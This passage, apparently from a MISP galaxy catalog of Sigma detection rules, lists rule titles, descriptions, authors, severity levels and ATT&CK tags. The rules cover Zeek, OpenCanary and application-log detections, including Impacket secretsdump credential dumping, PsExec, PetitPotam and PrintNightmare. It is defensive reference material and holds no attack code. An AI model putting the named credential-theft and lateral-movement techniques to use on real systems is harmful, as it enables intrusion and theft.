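Two of alice's RC4 tickets are flagged and the legacy ERP SPN is suppressed by the allowlist; bob's failed request (success F) is still reported, since the cipher asked for, not the outcome, is the signal. The per-host count is what turns a medium-severity per-event rule into something you can threshold on.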

Potential PetitPotam Attack Via EFS RPC Calls

Detects usage of the Windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack referred to as PetitPotam. The usage of this RPC function should be rare, if it is used at all, so any usage should warrant further investigation to determine whether it is legitimate. View surrounding logs (within a few minutes before and after) from the source IP. Logs from the source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc.

Internal MISP references

UUID 4096842a-8f9f-4d36-92b4-d0b2a62f9b2a which can be used as unique global reference for Potential PetitPotam Attack Via EFS RPC Calls in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron, @Antonlovesdnb, Mike Remen
creation_date 2021/08/17
falsepositive ['Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).']
filename zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.t1557.001', 'attack.t1187']

WebDav Put Request

A general detection for the WebDAV user agent being used to PUT files on a WebDAV network share. This could be an indicator of exfiltration.

Internal MISP references

UUID 705072a5-bb6f-4ced-95b6-ecfa6602090b which can be used as unique global reference for WebDav Put Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Unknown']
filename zeek_http_webdav_put_request.yml
level low
logsource.category No established category
logsource.product zeek
tags ['attack.exfiltration', 'attack.t1048.003']

Remote Task Creation via ATSVC Named Pipe - Zeek

Detects remote task creation via at.exe or API calls interacting with the ATSVC named pipe

Internal MISP references

UUID dde85b37-40cd-4a94-b00c-0b8794f956b5 which can be used as unique global reference for Remote Task Creation via ATSVC Named Pipe - Zeek in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, @neu5rn
creation_date 2020/04/03
falsepositive ['Unknown']
filename zeek_smb_converted_win_atsvc_task.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.lateral_movement', 'attack.persistence', 'car.2013-05-004', 'car.2015-04-001', 'attack.t1053.002']

Executable from Webdav

Detects executable access via WebDAV. Can be seen in APT29 activity, such as in the emulated APT29 hackathon https://github.com/OTRF/detection-hackathon-apt29/

Internal MISP references

UUID aac2fd97-bcba-491b-ad66-a6edf89c71bf which can be used as unique global reference for Executable from Webdav in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author SOC Prime, Adam Swan
creation_date 2020/05/01
falsepositive ['Unknown']
filename zeek_http_executable_download_from_webdav.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.command_and_control', 'attack.t1105']

DNS TOR Proxies

Identifies IPs performing DNS lookups associated with common Tor proxies.

Internal MISP references

UUID a8322756-015c-42e7-afb1-436e85ed3ff5 which can be used as unique global reference for DNS TOR Proxies in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Saw Winn Naung , Azure-Sentinel
creation_date 2021/08/15
falsepositive ['Unknown']
filename zeek_dns_torproxy.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.exfiltration', 'attack.t1048']

OMIGOD HTTP No Authentication RCE

Detects the exploitation of OMIGOD (CVE-2021-38647), which allows remote code execution (RCE) as root with just a single unauthenticated HTTP request. Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP); the client body is where the code to be executed would appear. Additionally, check the endpoint logs to see whether suspicious commands or activity occurred within the timeframe of this HTTP request.

Internal MISP references

UUID ab6b1a39-a9ee-4ab4-b075-e83acf6e346b which can be used as unique global reference for OMIGOD HTTP No Authentication RCE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nate Guagenti (neu5ron)
creation_date 2021/09/20
falsepositive ['Exploits that were attempted but unsuccessful.', 'Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips.']
filename zeek_http_omigod_no_auth_rce.yml
level high
logsource.category No established category
logsource.product zeek
tags ['attack.privilege_escalation', 'attack.initial_access', 'attack.execution', 'attack.lateral_movement', 'attack.t1068', 'attack.t1190', 'attack.t1203', 'attack.t1021.006', 'attack.t1210']

MITRE BZAR Indicators for Execution

Windows DCE-RPC functions which indicate execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation fields goes to MITRE.

Internal MISP references

UUID b640c0b8-87f8-4daa-aef8-95a24261dd1d which can be used as unique global reference for MITRE BZAR Indicators for Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron, SOC Prime
creation_date 2020/03/19
falsepositive ['Windows administrator tasks or troubleshooting', 'Windows management scripts or software']
filename zeek_dce_rpc_mitre_bzar_execution.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.execution', 'attack.t1047', 'attack.t1053.002', 'attack.t1569.002']

Possible Impacket SecretDump Remote Activity - Zeek

Detects AD credential dumping using the Impacket secretsdump HKTL. Based on the Sigma rule rules/windows/builtin/win_impacket_secretdump.yml

Internal MISP references

UUID 92dae1ed-1c9d-4eff-a567-33acbd95b00e which can be used as unique global reference for Possible Impacket SecretDump Remote Activity - Zeek in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, @neu5ron
creation_date 2020/03/19
falsepositive ['Unknown']
filename zeek_smb_converted_win_impacket_secretdump.yml
level high
logsource.category No established category
logsource.product zeek
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.003']

Suspicious PsExec Execution - Zeek

Detects execution of PsExec or PAExec with a renamed service name. This rule helps to filter out the noise when PsExec is used for legitimate purposes, or when an attacker uses a PsExec client other than the Sysinternals one.

Internal MISP references

UUID f1b3a22a-45e6-4004-afb5-4291f9c21166 which can be used as unique global reference for Suspicious PsExec Execution - Zeek in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, @neu5ron, Tim Shelton
creation_date 2020/04/02
falsepositive ['Unknown']
filename zeek_smb_converted_win_susp_psexec.yml
level high
logsource.category No established category
logsource.product zeek
tags ['attack.lateral_movement', 'attack.t1021.002']

New Kind of Network (NKN) Detection

NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>

Internal MISP references

UUID fa7703d6-0ee8-4949-889c-48c84bc15b6f which can be used as unique global reference for New Kind of Network (NKN) Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Portera (@mportatoes)
creation_date 2022/04/21
falsepositive ['Unknown']
filename zeek_dns_nkn.yml
level low
logsource.category No established category
logsource.product zeek
tags ['attack.command_and_control']

MITRE BZAR Indicators for Persistence

Windows DCE-RPC functions which indicate persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation fields goes to MITRE.

Internal MISP references

UUID 53389db6-ba46-48e3-a94c-e0f2cefe1583 which can be used as unique global reference for MITRE BZAR Indicators for Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron, SOC Prime
creation_date 2020/03/19
falsepositive ['Windows administrator tasks or troubleshooting', 'Windows management scripts or software']
filename zeek_dce_rpc_mitre_bzar_persistence.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.persistence', 'attack.t1547.004']

SMB Spoolss Name Piped Usage

Detects the use of the spoolss named pipe over SMB. This can be used to trigger NTLM authentication from any machine that has the Print Spooler service enabled.

Internal MISP references

UUID bae2865c-5565-470d-b505-9496c87d0c30 which can be used as unique global reference for SMB Spoolss Name Piped Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author OTR (Open Threat Research), @neu5ron
creation_date 2018/11/28
falsepositive ['Domain Controllers that are also acting as print servers (common, although they should not be)']
filename zeek_dce_rpc_smb_spoolss_named_pipe.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.lateral_movement', 'attack.t1021.002']

DNS Events Related To Mining Pools

Identifies clients that may be performing DNS lookups associated with common currency mining pools.

Internal MISP references

UUID bf74135c-18e8-4a72-a926-0e4f47888c19 which can be used as unique global reference for DNS Events Related To Mining Pools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Saw Winn Naung, Azure-Sentinel, @neu5ron
creation_date 2021/08/19
falsepositive ["A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'."]
filename zeek_dns_mining_pools.yml
level low
logsource.category No established category
logsource.product zeek
tags ['attack.execution', 'attack.t1569.002', 'attack.impact', 'attack.t1496']

Possible PrintNightmare Print Driver Install

Detects the remote installation of a print driver, which is a possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally or through group policy.

Internal MISP references

UUID 7b33baef-2a75-4ca3-9da4-34f9a15382d8 which can be used as unique global reference for Possible PrintNightmare Print Driver Install in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron (Nate Guagenti)
creation_date 2021/08/23
falsepositive ['Legitimate remote alteration of a printer driver.']
filename zeek_dce_rpc_printnightmare_print_driver_install.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.execution', 'cve.2021.1678', 'cve.2021.1675', 'cve.2021.34527']

Suspicious Access to Sensitive File Extensions - Zeek

Detects known sensitive file extensions via Zeek

Internal MISP references

UUID 286b47ed-f6fe-40b3-b3a8-35129acd43bc which can be used as unique global reference for Suspicious Access to Sensitive File Extensions - Zeek in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, @neu5ron
creation_date 2020/04/02
falsepositive ['Help Desk operator doing backup or re-imaging end user machine or backup software', 'Users working with these data types or exchanging message files']
filename zeek_smb_converted_win_susp_raccess_sensitive_fext.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.collection']

First Time Seen Remote Named Pipe - Zeek

This detection excludes known named pipes accessible remotely and notifies on newly observed ones; it may help to detect lateral movement and remote execution using named pipes.

Internal MISP references

UUID 021310d9-30a6-480a-84b7-eaa69aeb92bb which can be used as unique global reference for First Time Seen Remote Named Pipe - Zeek in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, @neu5ron, Tim Shelton
creation_date 2020/04/02
falsepositive ['Update the excluded named pipe to filter out any newly observed legit named pipe']
filename zeek_smb_converted_win_lm_namedpipe.yml
level high
logsource.category No established category
logsource.product zeek
tags ['attack.lateral_movement', 'attack.t1021.002']

Transferring Files with Credential Data via Network Shares - Zeek

Transferring files with well-known filenames (sensitive files with credential data) using network shares

Internal MISP references

UUID 2e69f167-47b5-4ae7-a390-47764529eff5 which can be used as unique global reference for Transferring Files with Credential Data via Network Shares - Zeek in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron, Teymur Kheirkhabarov, oscd.community
creation_date 2020/04/02
falsepositive ['Transferring sensitive files for legitimate administration work by legitimate administrator']
filename zeek_smb_converted_win_transferring_files_with_credential_data.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.001', 'attack.t1003.003']

Suspicious DNS Z Flag Bit Set

The DNS Z flag is a bit within the DNS protocol header that, per the IETF design, is meant to be reserved (unused). Although recently it has been used in DNSSEC, the value being set to anything other than 0 should be rare. If it is set to non-zero and DNSSEC is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one-off or the possibility of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs

Internal MISP references

UUID ede05abc-2c9e-4624-9944-9ff17fdc0bf5 which can be used as unique global reference for Suspicious DNS Z Flag Bit Set in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron, SOC Prime Team, Corelight
creation_date 2021/05/04
falsepositive ['Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.', 'If you work in a Public Sector then it may be good to exclude things like endswith ".edu", ".gov" and or ".mil"']
filename zeek_dns_susp_zbit_flag.yml
level medium
logsource.category No established category
logsource.product zeek
tags ['attack.t1095', 'attack.t1571', 'attack.command_and_control']

Django Framework Exceptions

Detects suspicious Django web application framework exceptions that could indicate exploitation attempts

Internal MISP references

UUID fd435618-981e-4a7c-81f8-f78ce480d616 which can be used as unique global reference for Django Framework Exceptions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/08/05
falsepositive ['Application bugs']
filename appframework_django_exceptions.yml
level medium
logsource.category application
logsource.product django
tags ['attack.initial_access', 'attack.t1190']

Potential RCE Exploitation Attempt In NodeJS

Detects process execution related errors in NodeJS. If the exceptions are caused by user input, they may suggest an RCE vulnerability.

Internal MISP references

UUID 97661d9d-2beb-4630-b423-68985291a8af which can be used as unique global reference for Potential RCE Exploitation Attempt In NodeJS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ["Puppeteer invocation exceptions often contain child_process related errors, that doesn't necessarily mean that the app is vulnerable."]
filename nodejs_rce_exploitation_attempt.yml
level high
logsource.category application
logsource.product nodejs
tags ['attack.initial_access', 'attack.t1190']

Spring Framework Exceptions

Detects suspicious Spring framework exceptions that could indicate exploitation attempts

Internal MISP references

UUID ae48ab93-45f7-4051-9dfe-5d30a3f78e33 which can be used as unique global reference for Spring Framework Exceptions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/08/06
falsepositive ['Application bugs']
filename spring_application_exceptions.yml
level medium
logsource.category application
logsource.product spring
tags ['attack.initial_access', 'attack.t1190']

Potential SpEL Injection In Spring Framework

Detects potential SpEL Injection exploitation, which may lead to RCE.

Internal MISP references

UUID e9edd087-89d8-48c9-b0b4-5b9bb10896b8 which can be used as unique global reference for Potential SpEL Injection In Spring Framework in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ['Application bugs']
filename spring_spel_injection.yml
level high
logsource.category application
logsource.product spring
tags ['attack.initial_access', 'attack.t1190']

OpenCanary - FTP Login Attempt

Detects instances where an FTP service on an OpenCanary node has had a login attempt.

Internal MISP references

UUID 6991bc2b-ae2e-447f-bc55-3a1ba04c14e5 which can be used as unique global reference for OpenCanary - FTP Login Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_ftp_login_attempt.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.initial_access', 'attack.exfiltration', 'attack.t1190', 'attack.t1021']

OpenCanary - Telnet Login Attempt

Detects instances where a Telnet service on an OpenCanary node has had a login attempt.

Internal MISP references

UUID 512cff7a-683a-43ad-afe0-dd398e872f36 which can be used as unique global reference for OpenCanary - Telnet Login Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_telnet_login_attempt.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.initial_access', 'attack.command_and_control', 'attack.t1133', 'attack.t1078']

OpenCanary - SIP Request

Detects instances where a SIP service on an OpenCanary node has received a SIP request.

Internal MISP references

UUID e30de276-68ec-435c-ab99-ef3befec6c61 which can be used as unique global reference for OpenCanary - SIP Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_sip_request.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.collection', 'attack.t1123']

OpenCanary - SMB File Open Request

Detects instances where an SMB service on an OpenCanary node has had a file open request.

Internal MISP references

UUID 22777c9e-873a-4b49-855f-6072ab861a52 which can be used as unique global reference for OpenCanary - SMB File Open Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_smb_file_open.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.lateral_movement', 'attack.collection', 'attack.t1021', 'attack.t1005']

OpenCanary - SSH Login Attempt

Detects instances where an SSH service on an OpenCanary node has had a login attempt.

Internal MISP references

UUID ff7139bc-fdb1-4437-92f2-6afefe8884cb which can be used as unique global reference for OpenCanary - SSH Login Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_ssh_login_attempt.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.initial_access', 'attack.lateral_movement', 'attack.persistence', 'attack.t1133', 'attack.t1021', 'attack.t1078']

OpenCanary - HTTPPROXY Login Attempt

Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.

Internal MISP references

UUID 5498fc09-adc6-4804-b9d9-5cca1f0b8760 which can be used as unique global reference for OpenCanary - HTTPPROXY Login Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_httpproxy_login_attempt.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.initial_access', 'attack.defense_evasion', 'attack.t1090']

OpenCanary - REDIS Action Command Attempt

Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.

Internal MISP references

UUID 547dfc53-ebf6-4afe-8d2e-793d9574975d which can be used as unique global reference for OpenCanary - REDIS Action Command Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_redis_command.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.credential_access', 'attack.collection', 'attack.t1003', 'attack.t1213']

OpenCanary - VNC Connection Attempt

Detects instances where a VNC service on an OpenCanary node has had a connection attempt.

Internal MISP references

UUID 9db5446c-b44a-4291-8b89-fcab5609c3b3 which can be used as unique global reference for OpenCanary - VNC Connection Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_vnc_connection_attempt.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.lateral_movement', 'attack.t1021']

OpenCanary - SNMP OID Request

Detects instances where an SNMP service on an OpenCanary node has had an OID request.

Internal MISP references

UUID e9856028-fd4e-46e6-b3d1-10f7ceb95078 which can be used as unique global reference for OpenCanary - SNMP OID Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_snmp_cmd.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.discovery', 'attack.lateral_movement', 'attack.t1016', 'attack.t1021']

OpenCanary - HTTP POST Login Attempt

Detects instances where an HTTP service on an OpenCanary node has had a login attempt via a form POST.

Internal MISP references

UUID af1ac430-df6b-4b38-b976-0b52f07a0252 which can be used as unique global reference for OpenCanary - HTTP POST Login Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_http_post_login_attempt.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.initial_access', 'attack.t1190']

OpenCanary - GIT Clone Request

Detects instances where a Git service on an OpenCanary node has received a Git clone request.

Internal MISP references

UUID 4fe17521-aef3-4e6a-9d6b-4a7c8de155a8 which can be used as unique global reference for OpenCanary - GIT Clone Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_git_clone_request.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.collection', 'attack.t1213']

OpenCanary - HTTP GET Request

Detects instances where an HTTP service on an OpenCanary node has received a GET request.

Internal MISP references

UUID af6c3078-84cd-4c68-8842-08b76bd81b13 which can be used as unique global reference for OpenCanary - HTTP GET Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_http_get.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.initial_access', 'attack.t1190']

OpenCanary - MSSQL Login Attempt Via Windows Authentication

Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.

Internal MISP references

UUID 6e78f90f-0043-4a01-ac41-f97681613a66 which can be used as unique global reference for OpenCanary - MSSQL Login Attempt Via Windows Authentication in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_mssql_login_winauth.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.credential_access', 'attack.collection', 'attack.t1003', 'attack.t1213']

OpenCanary - TFTP Request

Detects instances where a TFTP service on an OpenCanary node has received a request.

Internal MISP references

UUID b4e6b016-a2ac-4759-ad85-8000b300d61e which can be used as unique global reference for OpenCanary - TFTP Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_tftp_request.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.exfiltration', 'attack.t1041']

OpenCanary - MySQL Login Attempt

Detects instances where a MySQL service on an OpenCanary node has had a login attempt.

Internal MISP references

UUID e7d79a1b-25ed-4956-bd56-bd344fa8fd06 which can be used as unique global reference for OpenCanary - MySQL Login Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_mysql_login_attempt.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.credential_access', 'attack.collection', 'attack.t1003', 'attack.t1213']

OpenCanary - NTP Monlist Request

Detects instances where an NTP service on an OpenCanary node has received an NTP monlist request.

Internal MISP references

UUID 7cded4b3-f09e-405a-b96f-24248433ba44 which can be used as unique global reference for OpenCanary - NTP Monlist Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_ntp_monlist.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.impact', 'attack.t1498']

OpenCanary - SSH New Connection Attempt

Detects instances where an SSH service on an OpenCanary node has had a connection attempt.

Internal MISP references

UUID cd55f721-5623-4663-bd9b-5229cab5237d which can be used as unique global reference for OpenCanary - SSH New Connection Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_ssh_new_connection.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.initial_access', 'attack.lateral_movement', 'attack.persistence', 'attack.t1133', 'attack.t1021', 'attack.t1078']

OpenCanary - MSSQL Login Attempt Via SQLAuth

Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.

Internal MISP references

UUID 3ec9a16d-0b4f-4967-9542-ebf38ceac7dd which can be used as unique global reference for OpenCanary - MSSQL Login Attempt Via SQLAuth in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Security Onion Solutions
creation_date 2024/03/08
falsepositive ['Unlikely']
filename opencanary_mssql_login_sqlauth.yml
level high
logsource.category application
logsource.product opencanary
tags ['attack.credential_access', 'attack.collection', 'attack.t1003', 'attack.t1213']

Python SQL Exceptions

Generic rule for SQL exceptions raised by Python database drivers that follow PEP 249.

Internal MISP references

UUID 19aefed0-ffd4-47dc-a7fc-f8b1425e84f9 which can be used as unique global reference for Python SQL Exceptions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/08/12
falsepositive ['Application bugs']
filename app_python_sql_exceptions.yml
level medium
logsource.category application
logsource.product python
tags ['attack.initial_access', 'attack.t1190']

Potential OGNL Injection Exploitation In JVM Based Application

Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the cause of some high-profile RCEs, such as those in Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134).

Internal MISP references

UUID 4d0af518-828e-4a04-a751-a7d03f3046ad which can be used as unique global reference for Potential OGNL Injection Exploitation In JVM Based Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ['Application bugs']
filename java_ognl_injection_exploitation_attempt.yml
level high
logsource.category application
logsource.product jvm
tags ['attack.initial_access', 'attack.t1190', 'cve.2017.5638', 'cve.2022.26134']

Potential Local File Read Vulnerability In JVM Based Application

Detects potential local file read vulnerabilities in JVM based apps. If the exceptions are caused by user input and contain path traversal payloads, then it's a red flag.

Internal MISP references

UUID e032f5bc-4563-4096-ae3b-064bab588685 which can be used as unique global reference for Potential Local File Read Vulnerability In JVM Based Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ['Application bugs']
filename java_local_file_read.yml
level high
logsource.category application
logsource.product jvm
tags ['attack.initial_access', 'attack.t1190']

Process Execution Error In JVM Based Application

Detects process execution related exceptions in JVM based apps, which often relate to RCE.

Internal MISP references

UUID d65f37da-a26a-48f8-8159-3dde96680ad2 which can be used as unique global reference for Process Execution Error In JVM Based Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ['Application bugs']
filename java_rce_exploitation_attempt.yml
level high
logsource.category application
logsource.product jvm
tags ['attack.initial_access', 'attack.t1190']

Potential XXE Exploitation Attempt In JVM Based Application

Detects XML parsing issues. If the application expects to work with XML, make sure that the parser is initialized safely.

Internal MISP references

UUID c4e06896-e27c-4583-95ac-91ce2279345d which can be used as unique global reference for Potential XXE Exploitation Attempt In JVM Based Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ["If the application expects to work with XML there may be parsing issues that don't necessarily mean XXE."]
filename java_xxe_exploitation_attempt.yml
level high
logsource.category application
logsource.product jvm
tags ['attack.initial_access', 'attack.t1190']

Potential JNDI Injection Exploitation In JVM Based Application

Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation.

Internal MISP references

UUID bb0e9cec-d4da-46f5-997f-22efc59f3dca which can be used as unique global reference for Potential JNDI Injection Exploitation In JVM Based Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Moti Harmats
creation_date 2023/02/11
falsepositive ['Application bugs']
filename java_jndi_injection_exploitation_attempt.yml
level high
logsource.category application
logsource.product jvm
tags ['attack.initial_access', 'attack.t1190']

Suspicious SQL Error Messages

Detects SQL error messages that indicate probing for an injection attack

Internal MISP references

UUID 8a670c6d-7189-4b1c-8017-a417ca84a086 which can be used as unique global reference for Suspicious SQL Error Messages in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bjoern Kimminich
creation_date 2017/11/27
falsepositive ['A syntax error in MySQL also occurs in non-dynamic (safe) queries if there is an empty in() clause, that may often be the case.']
filename app_sqlinjection_errors.yml
level high
logsource.category application
logsource.product sql
tags ['attack.initial_access', 'attack.t1190']

Ruby on Rails Framework Exceptions

Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts

Internal MISP references

UUID 0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a which can be used as unique global reference for Ruby on Rails Framework Exceptions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/08/06
falsepositive ['Application bugs']
filename appframework_ruby_on_rails_exceptions.yml
level medium
logsource.category application
logsource.product ruby_on_rails
tags ['attack.initial_access', 'attack.t1190']

SharpHound Recon Account Discovery

Detects remote RPC calls used by SharpHound to map remote connections and local group membership.

Internal MISP references

UUID 65f77b1e-8e79-45bf-bb67-5988a8ce45a5 which can be used as unique global reference for SharpHound Recon Account Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Unknown']
filename rpc_firewall_sharphound_recon_account.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.t1087', 'attack.discovery']

Remote Registry Recon

Detects remote RPC calls to collect information

Internal MISP references

UUID d8ffe17e-04be-4886-beb9-c1dd1944b9a8 which can be used as unique global reference for Remote Registry Recon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sagie Dulce, Dekel Paz
creation_date 2022/01/01
falsepositive ['Remote administration of registry values']
filename rpc_firewall_remote_registry_recon.yml
level high
logsource.category application
logsource.product rpc_firewall
tags ['attack.discovery']

Remote Schedule Task Recon via ITaskSchedulerService

Detects remote RPC calls to read information about scheduled tasks

Internal MISP references

